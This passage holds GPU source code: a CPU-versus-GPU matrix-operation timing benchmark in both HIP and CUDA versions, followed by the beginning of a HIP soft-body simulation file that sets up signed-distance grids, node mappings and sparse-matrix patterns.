second_index = j * MATRIX_SIZE + i; result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } return result; } void cuda_memory_allocation(int **pointer) { hipError_t result = hipMalloc((void**)pointer, DATA_SIZE); if (result != hipSuccess) { printf("%s\n", hipGetErrorString(result)); } } void cuda_memcpy_host_to_device(int *source, int *destination) { hipError_t result = hipMemcpy(destination, source, DATA_SIZE, hipMemcpyHostToDevice); if (result != hipSuccess) { printf("%s\n", hipGetErrorString(result)); } } void cuda_memcpy_device_to_host(int *source, int *destination) { hipError_t result = hipMemcpy(source, destination, DATA_SIZE, hipMemcpyDeviceToHost); if (result != hipSuccess) { printf("%s\n", hipGetErrorString(result)); } } bool is_matrix_equals(int *first_matrix, int *second_matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { if (first_matrix[i * MATRIX_SIZE + j] != second_matrix[i * MATRIX_SIZE + j]) { printf("\n%d != %d [%d]\n", first_matrix[i * MATRIX_SIZE + j], second_matrix[i * MATRIX_SIZE + j], i * MATRIX_SIZE + j); return false; } } } return true; } int* fill_matrix(int *matrix) { if (matrix == NULL) { return NULL; } for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { matrix[i * MATRIX_SIZE + j] = rand() % 1000; } } return matrix; } void print_matrix(int** matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { printf("%u\t", matrix[i][j]); if (j == MATRIX_SIZE - 1) { printf("\n"); } } } printf("\n"); printf("\n"); } int* process_matrix_cpu(int *A, int *B, int *C) { int *result; fill_matrix(A); fill_matrix(C); fill_matrix(B); clock_t start, stop; start = clock(); result = simple_matrix_multiplication(A, B, C); stop = clock(); printf("Run time CPU = %d \n", stop - start); return result; } int* process_matrix_gpu(int *A, int *B, int *X, bool shared) { int *device_memory; int *result = (int*)_aligned_malloc(DATA_SIZE, 32); memset(result, 0, DATA_SIZE); cuda_memory_allocation(&device_memory); cuda_memcpy_host_to_device(result, device_memory); hipEvent_t start, stop; hipEventCreate(&start); hipEventCreate(&stop); hipEventRecord(start); dim3 threads(FIBER, FIBER); dim3 blocks((MATRIX_SIZE + (FIBER - 1)) / FIBER, (MATRIX_SIZE + (FIBER - 1)) / FIBER); hipEventSynchronize(start); if (shared) { hipLaunchKernelGGL(( kernel_shared) , dim3(blocks), dim3(threads) , 0, 0, A, X, B, device_memory); } else { hipLaunchKernelGGL(( kernel) , dim3(blocks), dim3(threads) , 0, 0, A, X, B, device_memory); } hipError_t error = hipGetLastError(); if (error != hipSuccess) { printf("%s\n", hipGetErrorString(error)); } hipEventRecord(stop); hipEventSynchronize(stop); float timer = 0; hipEventElapsedTime(&timer, start, stop); if (!shared) { cout << "Run time GPU = " << timer << endl; } else { cout << "Run time GPU (shared) = " << timer << endl; } hipEventRecord(start); cuda_memcpy_device_to_host(result, device_memory); return result; } int main(int argc, char* argv[]) { int *gpu_A, *gpu_B, *gpu_C; int *gpu_shared_A, *gpu_shared_B, *gpu_shared_C; int *A, *B, *C; int *cpu_result, *gpu_result, *gpu_shared_result; A = (int*)_aligned_malloc(DATA_SIZE, 32); B = (int*)_aligned_malloc(DATA_SIZE, 32); C = (int*)_aligned_malloc(DATA_SIZE, 32); cpu_result = process_matrix_cpu(A, B, C); cuda_memory_allocation(&gpu_A); cuda_memory_allocation(&gpu_B); cuda_memory_allocation(&gpu_C); cuda_memory_allocation(&gpu_shared_A); cuda_memory_allocation(&gpu_shared_B); cuda_memory_allocation(&gpu_shared_C); cuda_memcpy_host_to_device(A, gpu_A); cuda_memcpy_host_to_device(B, gpu_B); cuda_memcpy_host_to_device(C, gpu_C); cuda_memcpy_host_to_device(A, gpu_shared_A); cuda_memcpy_host_to_device(B, gpu_shared_B); cuda_memcpy_host_to_device(C, gpu_shared_C); gpu_result = process_matrix_gpu(gpu_A, gpu_B, gpu_C, false); gpu_shared_result = process_matrix_gpu(gpu_shared_A, gpu_shared_B, gpu_shared_C, true); if (!is_matrix_equals(cpu_result, gpu_result)) { printf("Errors occured!\n"); } if (!is_matrix_equals(cpu_result, gpu_shared_result)) { printf("Error occured! (shared)\n"); } _aligned_free(A); _aligned_free(B); _aligned_free(C); _aligned_free(cpu_result); system("pause"); }
9ed9b8df89bbf3d24d6338b2017c5430787aadb3.cu
#include <stdio.h> #include <stdlib.h> #include <iostream> #include <string.h> #include <time.h> #include <malloc.h> #include <cuda_runtime.h> #include <device_launch_parameters.h> #define FIBER 32 #define MATRIX_SIZE 2048 #define DATA_SIZE MATRIX_SIZE * MATRIX_SIZE * sizeof(int) #define MAX_MATRIX_SIZE (MATRIX_SIZE * MATRIX_SIZE) __global__ void kernel_shared(int *A, int *C, int *B, int *result) { __shared__ int shared_memory[FIBER][FIBER]; int i = blockIdx.x * blockDim.x + threadIdx.y; int j = blockIdx.y * blockDim.y + threadIdx.x; shared_memory[threadIdx.y][threadIdx.x] = B[i * MATRIX_SIZE + j]; __syncthreads(); i = blockIdx.x * blockDim.x + threadIdx.x; j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * shared_memory[threadIdx.x][threadIdx.y] - C[first_index]; } } __global__ void kernel(int *A, int *C, int *B, int *result) { int i = blockIdx.x * blockDim.x + threadIdx.x; int j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } using namespace std; int* simple_matrix_multiplication(int* A, int* B, int* C) { int *result = (int*)_aligned_malloc(DATA_SIZE, 32); for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { int first_index = i * MATRIX_SIZE + j; int second_index = j * MATRIX_SIZE + i; result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } return result; } void cuda_memory_allocation(int **pointer) { cudaError_t result = cudaMalloc((void**)pointer, DATA_SIZE); if (result != cudaSuccess) { printf("%s\n", cudaGetErrorString(result)); } } void cuda_memcpy_host_to_device(int *source, int *destination) { cudaError_t result = cudaMemcpy(destination, source, DATA_SIZE, cudaMemcpyHostToDevice); if (result != cudaSuccess) { printf("%s\n", cudaGetErrorString(result)); } } void cuda_memcpy_device_to_host(int *source, int *destination) { cudaError_t result = cudaMemcpy(source, destination, DATA_SIZE, cudaMemcpyDeviceToHost); if (result != cudaSuccess) { printf("%s\n", cudaGetErrorString(result)); } } bool is_matrix_equals(int *first_matrix, int *second_matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { if (first_matrix[i * MATRIX_SIZE + j] != second_matrix[i * MATRIX_SIZE + j]) { printf("\n%d != %d [%d]\n", first_matrix[i * MATRIX_SIZE + j], second_matrix[i * MATRIX_SIZE + j], i * MATRIX_SIZE + j); return false; } } } return true; } int* fill_matrix(int *matrix) { if (matrix == NULL) { return NULL; } for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { matrix[i * MATRIX_SIZE + j] = rand() % 1000; } } return matrix; } void print_matrix(int** matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { printf("%u\t", matrix[i][j]); if (j == MATRIX_SIZE - 1) { printf("\n"); } } } printf("\n"); printf("\n"); } int* process_matrix_cpu(int *A, int *B, int *C) { int *result; fill_matrix(A); fill_matrix(C); fill_matrix(B); clock_t start, stop; start = clock(); result = simple_matrix_multiplication(A, B, C); stop = clock(); printf("Run time CPU = %d \n", stop - start); return result; } int* process_matrix_gpu(int *A, int *B, int *X, bool shared) { int *device_memory; int *result = (int*)_aligned_malloc(DATA_SIZE, 32); memset(result, 0, DATA_SIZE); cuda_memory_allocation(&device_memory); cuda_memcpy_host_to_device(result, device_memory); cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start); dim3 threads(FIBER, FIBER); dim3 blocks((MATRIX_SIZE + (FIBER - 1)) / FIBER, (MATRIX_SIZE + (FIBER - 1)) / FIBER); cudaEventSynchronize(start); if (shared) { kernel_shared <<< blocks, threads >>> (A, X, B, device_memory); } else { kernel <<< blocks, threads >>> (A, X, B, device_memory); } cudaError_t error = cudaGetLastError(); if (error != cudaSuccess) { printf("%s\n", cudaGetErrorString(error)); } cudaEventRecord(stop); cudaEventSynchronize(stop); float timer = 0; cudaEventElapsedTime(&timer, start, stop); if (!shared) { cout << "Run time GPU = " << timer << endl; } else { cout << "Run time GPU (shared) = " << timer << endl; } cudaEventRecord(start); cuda_memcpy_device_to_host(result, device_memory); return result; } int main(int argc, char* argv[]) { int *gpu_A, *gpu_B, *gpu_C; int *gpu_shared_A, *gpu_shared_B, *gpu_shared_C; int *A, *B, *C; int *cpu_result, *gpu_result, *gpu_shared_result; A = (int*)_aligned_malloc(DATA_SIZE, 32); B = (int*)_aligned_malloc(DATA_SIZE, 32); C = (int*)_aligned_malloc(DATA_SIZE, 32); cpu_result = process_matrix_cpu(A, B, C); cuda_memory_allocation(&gpu_A); cuda_memory_allocation(&gpu_B); cuda_memory_allocation(&gpu_C); cuda_memory_allocation(&gpu_shared_A); cuda_memory_allocation(&gpu_shared_B); cuda_memory_allocation(&gpu_shared_C); cuda_memcpy_host_to_device(A, gpu_A); cuda_memcpy_host_to_device(B, gpu_B); cuda_memcpy_host_to_device(C, gpu_C); cuda_memcpy_host_to_device(A, gpu_shared_A); cuda_memcpy_host_to_device(B, gpu_shared_B); cuda_memcpy_host_to_device(C, gpu_shared_C); gpu_result = process_matrix_gpu(gpu_A, gpu_B, gpu_C, false); gpu_shared_result = process_matrix_gpu(gpu_shared_A, gpu_shared_B, gpu_shared_C, true); if (!is_matrix_equals(cpu_result, gpu_result)) { printf("Errors occured!\n"); } if (!is_matrix_equals(cpu_result, gpu_shared_result)) { printf("Error occured! (shared)\n"); } _aligned_free(A); _aligned_free(B); _aligned_free(C); _aligned_free(cpu_result); system("pause"); }
SoftBodyGrid3D.hip
// !!! This is a file automatically generated by hipify!!! #include "SoftBodyGrid3D.h" #include <cinder/app/AppBase.h> #include <cinder/CinderGlm.h> #include <Eigen/Dense> #include "Utils.h" #include "Integration3D.h" #include "CommonKernels.h" #include "DebugUtils.h" #include "CudaTimer.h" //For testing: set to 1 to enforce a symmetric matrix in the CG //If 0, small unsymmetries of a few ulps are in the matrix due to the ordering of the operations //If 1, the upper and lower triangular parts are averaged to create a numerically exact symmetric matrix #define MAKE_NEWMARK_SYMMETRIC 0 namespace ar3d { int3 SoftBodyGrid3D::offsets[8] = { make_int3(-1, -1, -1), make_int3(0, -1, -1), make_int3(-1, 0, -1), make_int3(0, 0, -1), make_int3(-1, -1, 0), make_int3(0, -1, 0), make_int3(-1, 0, 0), make_int3(0, 0, 0) }; void SoftBodyGrid3D::Input::assertSizes() const { assert(referenceSdf_->getGrid() == grid_); assert(posToIndex_->getGrid() == grid_); assert(numActiveCells_ > 0); assert(numActiveNodes_ > 0); assert(interpolationVolumeWeights_.rows() == numActiveCells_); assert(interpolationBoundaryWeights_.rows() == numActiveCells_); assert(surfaceNormals_.rows() == numActiveCells_); assert(dirichlet_.rows() == numActiveCells_); assert(mapping_.rows() == numActiveCells_); assert(referencePositions_.rows() == numActiveNodes_); //assert(sparsityPattern_.cols == numActiveNodes_); //assert(sparsityPattern_.rows == numActiveNodes_); } SoftBodyGrid3D::State SoftBodyGrid3D::State::deepClone() const { State s; s.displacements_ = displacements_.deepClone(); s.velocities_ = velocities_.deepClone(); s.advectedBoundingBox_ = advectedBoundingBox_; s.gridDisplacements_ = gridDisplacements_.deepClone(); if (advectedSDF_) { s.advectedSDF_ = std::make_shared<WorldGridData<real>>(advectedSDF_->getGrid()); s.advectedSDF_->setDeviceMemory(advectedSDF_->getDeviceMemory().deepClone()); } return s; } WorldGridPtr SoftBodyGrid3D::createGridFromBoundingBox( const ar::geom3d::AABBBox boundingBox, int resolution, int border) { Eigen::Vector3i offset = (boundingBox.min.array() * resolution).floor().cast<int>() - border; Eigen::Vector3i size = ((boundingBox.max - boundingBox.min).array() * resolution).ceil().cast<int>() + (2 * border); return std::make_shared<WorldGrid>(resolution, offset, size); } void SoftBodyGrid3D::setupInput1Grid(Input& input, real3 center, real3 halfsize, int resolution, int border) { Eigen::Vector3d bbmin(center.x - halfsize.x, center.y - halfsize.y, center.z - halfsize.z); Eigen::Vector3d bbmax(center.x + halfsize.x, center.y + halfsize.y, center.z + halfsize.z); input.grid_ = createGridFromBoundingBox(ar::geom3d::AABBBox(bbmin, bbmax), resolution, border); } void SoftBodyGrid3D::setupInput2Sdf(Input& input, std::function<real(real3)> posToSdf) { input.referenceSdf_ = std::make_shared<WorldGridData<real>>(input.grid_); input.referenceSdf_->allocateHostMemory(); const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { real3 pos = make_real3( (offset.x() + x) / real(input.grid_->getVoxelResolution()), (offset.y() + y) / real(input.grid_->getVoxelResolution()), (offset.z() + z) / real(input.grid_->getVoxelResolution()) ); input.referenceSdf_->atHost(x, y, z) = posToSdf(pos); } } void SoftBodyGrid3D::setupInput3Mapping(Input& input, int diffusionDistance) { bool noDiffusionLimit = diffusionDistance <= 0; const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); const int resolution = input.grid_->getVoxelResolution(); int numActiveNodes = 0; int numDiffusedNodes = 0; int numInactiveNodes = 0; input.posToIndex_ = std::make_shared<WorldGridData<int>>(input.grid_); input.posToIndex_->allocateHostMemory(); input.posToIndex_->getHostMemory().setConstant(noDiffusionLimit ? -1 : -diffusionDistance-1); //Loop: active cells -> active nodes for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (active) for (int i=0; i<8; ++i) input.posToIndex_->atHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) = 1; } //Loop: for the inactive nodes, compute the minimal distance to the next active node in the Manhattan norm if (!noDiffusionLimit) { for (int i = 0; i <= diffusionDistance; ++i) { for (int z = 0; z < size.z(); ++z) for (int y = 0; y < size.y(); ++y) for (int x = 0; x < size.x(); ++x) { int idx = input.posToIndex_->atHost(x, y, z); if (idx > 0) continue; //active if (x > 0) idx = ::max(idx, input.posToIndex_->atHost(x - 1, y, z) - 1); if (y > 0) idx = ::max(idx, input.posToIndex_->atHost(x, y - 1, z) - 1); if (z > 0) idx = ::max(idx, input.posToIndex_->atHost(x, y, z - 1) - 1); if (x < size.x() - 1) idx = ::max(idx, input.posToIndex_->atHost(x + 1, y, z) - 1); if (y < size.y() - 1) idx = ::max(idx, input.posToIndex_->atHost(x, y + 1, z) - 1); if (z < size.z() - 1) idx = ::max(idx, input.posToIndex_->atHost(x, y, z + 1) - 1); if (idx == 0) idx = -1; //neighbor to active input.posToIndex_->atHost(x, y, z) = idx; } } } //Loop: mapping std::vector<real3> referencePositions; for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { int idx = input.posToIndex_->getHost(x, y, z); if (idx > 0) { //active nodes, participates in the elasticity simulation numActiveNodes++; input.posToIndex_->atHost(x, y, z) = numActiveNodes; referencePositions.push_back( make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) )); } else if (idx <= -diffusionDistance - 1 && !noDiffusionLimit) { //too far outside, not needed in the diffusion numInactiveNodes++; input.posToIndex_->atHost(x, y, z) = 0; //input.referenceSdf_->atHost(x, y, z) = std::numeric_limits<real>::infinity(); } else { //participates in the diffusion numDiffusedNodes++; input.posToIndex_->atHost(x, y, z) = -numDiffusedNodes; } } input.posToIndex_->copyHostToDevice(); input.numActiveNodes_ = numActiveNodes; input.numDiffusedNodes_ = numDiffusedNodes; input.referencePositions_ = Vector3X(numActiveNodes); input.referencePositions_.copyFromHost(referencePositions.data()); input.referenceSdf_->copyHostToDevice(); CI_LOG_I("num active nodes: " << numActiveNodes << ", num diffused nodes: " << numDiffusedNodes << ", num inactive nodes: " << numInactiveNodes); } void SoftBodyGrid3D::setupInput4CellData(Input& input, bool enableDirichlet, real3 dirichletCenter, real3 dirichletHalfsize, bool integralsSampled) { const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); const int resolution = input.grid_->getVoxelResolution(); int numActiveCells = 0; std::vector<char> dirichlet; std::vector<int4> mapping; std::vector<real8> volumeWeights; std::vector<real8> surfaceWeights; std::vector<real3> surfaceNormals; std::vector<real8> cellSdfs; real3 dirichletMin = dirichletCenter - dirichletHalfsize; real3 dirichletMax = dirichletCenter + dirichletHalfsize; input.hasDirichlet_ = false; real3 centerOfMass = make_real3(0, 0, 0); real totalVolume = 0; for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; numActiveCells++; //mapping int4 map = make_int4( input.posToIndex_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) - 1, input.posToIndex_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) - 1, input.posToIndex_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) - 1, input.posToIndex_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) - 1 ); mapping.push_back(map); assert(map.x + 2 == input.posToIndex_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) && "Invariant '+x follows -x' violated"); assert(map.y + 2 == input.posToIndex_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) && "Invariant '+x follows -x' violated"); assert(map.z + 2 == input.posToIndex_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) && "Invariant '+x follows -x' violated"); assert(map.w + 2 == input.posToIndex_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z) && "Invariant '+x follows -x' violated"); //interpolation weights Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; interpPhi.second.z = values[6]; interpPhi.second.w = values[7]; real h = static_cast<real>(input.grid_->getVoxelSize()); Integration3D::InterpolationWeight_t wx = integralsSampled ? Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegralLinear(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; totalVolume += volume; assert(volume > 0); volumeWeights.push_back(wx); auto sx = Integration3D::surfaceIntegral(interpPhi, h); surfaceWeights.push_back(sx); assert(isfinite(wx.first.x)); assert(isfinite(wx.first.y)); assert(isfinite(wx.first.z)); assert(isfinite(wx.first.w)); assert(isfinite(wx.second.x)); assert(isfinite(wx.second.y)); assert(isfinite(wx.second.z)); assert(isfinite(wx.second.w)); assert(isfinite(sx.first.x)); assert(isfinite(sx.first.y)); assert(isfinite(sx.first.z)); assert(isfinite(sx.first.w)); assert(isfinite(sx.second.x)); assert(isfinite(sx.second.y)); assert(isfinite(sx.second.z)); assert(isfinite(sx.second.w)); //cell SDF values cellSdfs.push_back(interpPhi); //normal float3 normal = make_float3( (values[1]+values[3]+values[5]+values[7])/4 - (values[0]+values[2]+values[4]+values[6])/4, (values[2]+values[3]+values[6]+values[7])/4 - (values[0]+values[1]+values[4]+values[5])/4, (values[4]+values[5]+values[6]+values[7])/4 - (values[0]+values[1]+values[2]+values[3])/4 ); normal = safeNormalize(normal); surfaceNormals.push_back(make_real4(normal.x, normal.y, normal.z, 0)); //dirichlet if (enableDirichlet) { real3 cellMin = make_real3( (offset.x() + x - 1) / real(resolution), (offset.y() + y - 1) / real(resolution), (offset.z() + z - 1) / real(resolution) ); real3 cellMax = make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) ); bool isDirichlet = all(cellMax >= dirichletMin) && all(dirichletMax >= cellMin); dirichlet.push_back(isDirichlet); if (isDirichlet) input.hasDirichlet_ = true; } else dirichlet.push_back(false); //center of mass real weights[] = { wx.first.x, wx.first.y, wx.first.z, wx.first.w, wx.second.x, wx.second.y, wx.second.z, wx.second.w }; for (int i = 0; i < 8; ++i) centerOfMass += weights[i] * make_real3( (offset.x() + x + offsets[i].x) / real(resolution), (offset.y() + y + offsets[i].y) / real(resolution), (offset.z() + z + offsets[i].z) / real(resolution)); } input.numActiveCells_ = numActiveCells; input.mapping_ = Vector4Xi(numActiveCells); input.mapping_.copyFromHost(mapping.data()); input.dirichlet_ = VectorXc(numActiveCells); input.dirichlet_.copyFromHost(dirichlet.data()); input.interpolationVolumeWeights_ = Vector8X(numActiveCells); input.interpolationVolumeWeights_.copyFromHost(volumeWeights.data()); input.interpolationBoundaryWeights_ = Vector8X(numActiveCells); input.interpolationBoundaryWeights_.copyFromHost(surfaceWeights.data()); input.surfaceNormals_ = Vector3X(numActiveCells); input.surfaceNormals_.copyFromHost(surfaceNormals.data()); input.cellSdfs_ = Vector8X(numActiveCells); input.cellSdfs_.copyFromHost(cellSdfs.data()); input.centerOfMass_ = centerOfMass / totalVolume; //find index of free nodes that is closest to the center of mass std::vector<real3> referencePositions(input.referencePositions_.size()); input.referencePositions_.copyToHost(&referencePositions[0]); input.centerOfMassIndex_ = 0; float minCoMDistance = FLT_MAX; for (int i=0; i<referencePositions.size(); ++i) { float d = lengthSquared3(referencePositions[i] - input.centerOfMass_); if (d < minCoMDistance) { minCoMDistance = d; input.centerOfMassIndex_ = i; } } CI_LOG_I("num active cells: " << numActiveCells); CI_LOG_I("center of mass: (" << input.centerOfMass_.x << "," << input.centerOfMass_.y << "," << input.centerOfMass_.z << ")"); CI_LOG_I("total volume: " << totalVolume); } void SoftBodyGrid3D::setupInput5SparsityPattern(Input& input) { typedef cuMat::SparsityPattern<cuMat::CSR> SPattern; SPattern pattern; pattern.rows = input.numActiveNodes_; pattern.cols = input.numActiveNodes_; //create entry set typedef std::pair<int, int> entry_t; std::set<entry_t> entries; const auto& size = input.grid_->getSize(); for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; int indices[8]; for (int i=0; i<8; ++i) { indices[i] = input.posToIndex_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) - 1; assert(indices[i] >= 0); } for (int i=0; i<8; ++i) for (int j=0; j<8; ++j) entries.insert(std::make_pair(indices[i], indices[j])); } SMatrix3x3::StorageIndex nnz = static_cast<SMatrix3x3::StorageIndex>(entries.size()); pattern.nnz = nnz; //allocate indices on the host std::vector<SMatrix3x3::StorageIndex> JA(pattern.rows + 1, 0); //outer std::vector<SMatrix3x3::StorageIndex> IA; IA.reserve(nnz); //inner //loop through all sorted entries and build indices entry_t lastEntry(-1,-1); for (const entry_t& e : entries) { //assert sorted assert(lastEntry.first < e.first || (lastEntry.first==e.first && lastEntry.second<e.second)); lastEntry = e; //increment outer index, add inner index JA[lastEntry.first + 1]++; IA.push_back(lastEntry.second); } assert(IA.size() == nnz); for (int i=0; i<pattern.rows; ++i) JA[i+1] += JA[i]; //prefix sum //copy to device pattern.JA = SPattern::IndexVector(pattern.rows + 1); pattern.JA.copyFromHost(JA.data()); pattern.IA = SPattern::IndexVector(nnz); pattern.IA.copyFromHost(IA.data()); CI_LOG_I("Sparsity pattern created, matrix size: " << pattern.rows << ", non-zeros: " << nnz << " (" << (100.0*nnz / pattern.rows / pattern.rows) << "%, avg " << (real(nnz)/pattern.rows) << " per row)"); pattern.assertValid(); input.sparsityPattern_ = pattern; } SoftBodyGrid3D::Precomputed SoftBodyGrid3D::allocatePrecomputed(const Input& input) { Precomputed p; p.lumpedMass_ = VectorX(input.numActiveNodes_); p.lumpedMass_.setZero(); p.bodyForces_ = Vector3X(input.numActiveNodes_); p.bodyForces_.setZero(); return p; } SoftBodyGrid3D::State SoftBodyGrid3D::allocateState(const Input& input) { State s; s.displacements_ = Vector3X(input.numActiveNodes_); s.displacements_.setZero(); s.velocities_ = Vector3X(input.numActiveNodes_); s.velocities_.setZero(); const auto& size = input.grid_->getSize(); s.gridDisplacements_ = WorldGridData<real3>::DeviceArray_t(size.x(), size.y(), size.z()); return s; } SoftBodyGrid3D::Input SoftBodyGrid3D::createBar(const InputBarSettings& settings) { Input input; setupInput1Grid(input, settings.center, settings.halfsize, settings.resolution); std::function<real(real3)> posToSdf = [&settings](real3 pos) { real val = 0; if (all(pos >= settings.center - settings.halfsize) && all(pos <= settings.center + settings.halfsize)) { val = -1e10; val = ::max(val, settings.center.x - settings.halfsize.x - pos.x); val = ::max(val, pos.x - settings.center.x - settings.halfsize.x); val = ::max(val, settings.center.y - settings.halfsize.y - pos.y); val = ::max(val, pos.y - settings.center.y - settings.halfsize.y); val = ::max(val, settings.center.z - settings.halfsize.z - pos.z); val = ::max(val, pos.z - settings.center.z - settings.halfsize.z); } else { real3 closestPoint = clamp(pos, settings.center - settings.halfsize, settings.center + settings.halfsize); val = length(closestPoint - pos); } if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createTorus(const InputTorusSettings& settings) { Input input; real3 halfsize; real3 orientation = make_real3(settings.orientation.x, settings.orientation.y, settings.orientation.z); halfsize.x = sqrt(1 - ar::square(dot3(orientation, make_real3(1, 0, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.y = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 1, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.z = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 0, 1)))) * settings.outerRadius + settings.innerRadius; halfsize.w = 0; setupInput1Grid(input, settings.center, halfsize, settings.resolution); glm::vec3 a(0, 0, 1); glm::vec3 b(settings.orientation.x, settings.orientation.y, settings.orientation.z); glm::vec3 v = glm::cross(b, a); float angle = acos(glm::dot(b, a) / (glm::length(b) * glm::length(a))); glm::mat4 rotmat = glm::rotate(angle, v); std::function<real(real3)> posToSdf = [&settings, rotmat](real3 pos) { real val = 0; pos -= settings.center; //move towards the center glm::vec4 pos4(pos.x, pos.y, pos.z, 1); pos4 = rotmat * pos4; //rotate val = ar::square(sqrt(pos4.x*pos4.x + pos4.y*pos4.y) - settings.outerRadius) + pos4.z*pos4.z - ar::square(settings.innerRadius); val *= settings.resolution; if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromSdf(const InputSdfSettings & settings, WorldGridRealDataPtr referenceSdf) { Input input; input.grid_ = referenceSdf->getGrid(); input.referenceSdf_ = referenceSdf; for (size_t j = 0; j < input.referenceSdf_->getHostMemory().size(); ++j) { if (abs(input.referenceSdf_->getHostMemory()[j]) < settings.zeroCutoff) input.referenceSdf_->getHostMemory()[j] = 0; //This step is essential for stability } if (settings.filledCells) { WorldGridData<real>::HostArray_t copy = input.referenceSdf_->getHostMemory(); copy.setConstant(real(+1)); const auto size = input.referenceSdf_->getGrid()->getSize(); //mark complete grid cells for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { real values[8]; bool active = false; for (int i = 0; i < 8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; interpPhi.second.z = values[6]; interpPhi.second.w = values[7]; real h = real(1); Integration3D::InterpolationWeight_t wx = settings.sampleIntegrals ? Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegral(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; if (volume > 0.5) { for (int i = 0; i < 8; ++i) copy[input.referenceSdf_->toLinear(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z)] = 0; } } //repair inner values 